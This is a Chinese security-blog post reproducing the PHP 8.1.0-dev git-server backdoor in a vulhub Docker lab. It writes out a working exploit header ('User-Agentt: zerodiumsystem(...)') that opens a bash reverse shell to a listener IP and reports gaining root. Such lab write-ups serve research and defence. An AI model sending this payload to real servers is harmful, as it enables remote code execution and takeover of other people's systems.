PHP 8.1.0-dev 开发版本后门漏洞复现

admin 2021年12月2日08:39:21代码审计评论45 views623字阅读2分4秒阅读模式

漏洞背景

PHP(Hypertext Preprocessor)即“超文本预处理器”,是在服务器端执行的脚本语言,尤其适用于Web开发并可嵌入HTML中。PHP语法利用了C、Java和Perl,该语言的主要目标是让web开发人员快速编写动态网页。前段时间,监测到PHP官方发布通告称,有人入侵了PHP编程语言的官方Git服务器,并提交了包含后门文件的更新包。


漏洞原理

该事件是黑客利用具有git权限的账户提交了一个恶意commit,给PHP源码的zlib扩展增加了一个后门。如果该行由PHP驱动的网站运行,则将允许未经授权的访问者执行他们选择的代码。当发现请求特殊的HTTP头部中包含字符串zerodium时,则用eval执行User-Agent第8位字符后内容。利用该后门,攻击者可以执行任意命令,对于任何使用了存在后门PHP的服务器来说都有巨大的风险和威胁。


漏洞类型 

远程代码执行


严重等级

高危


环境搭建

cd vulhub-master/php/8.1-backdoordocker-compose up -d


漏洞复现

访问页面

PHP 8.1.0-dev 开发版本后门漏洞复现


使用Burpsuite抓取数据包

PHP 8.1.0-dev 开发版本后门漏洞复现


添加请求头

User-Agentt: zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/192.168.1.9/6666 0>&1'");

PHP 8.1.0-dev 开发版本后门漏洞复现


开启监听

PHP 8.1.0-dev 开发版本后门漏洞复现


发送数据包,反弹shell,获得root权限

PHP 8.1.0-dev 开发版本后门漏洞复现



本文始发于微信公众号(亿人安全):PHP 8.1.0-dev 开发版本后门漏洞复现

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月2日08:39:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  PHP 8.1.0-dev 开发版本后门漏洞复现 http://cn-sec.com/archives/442312.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: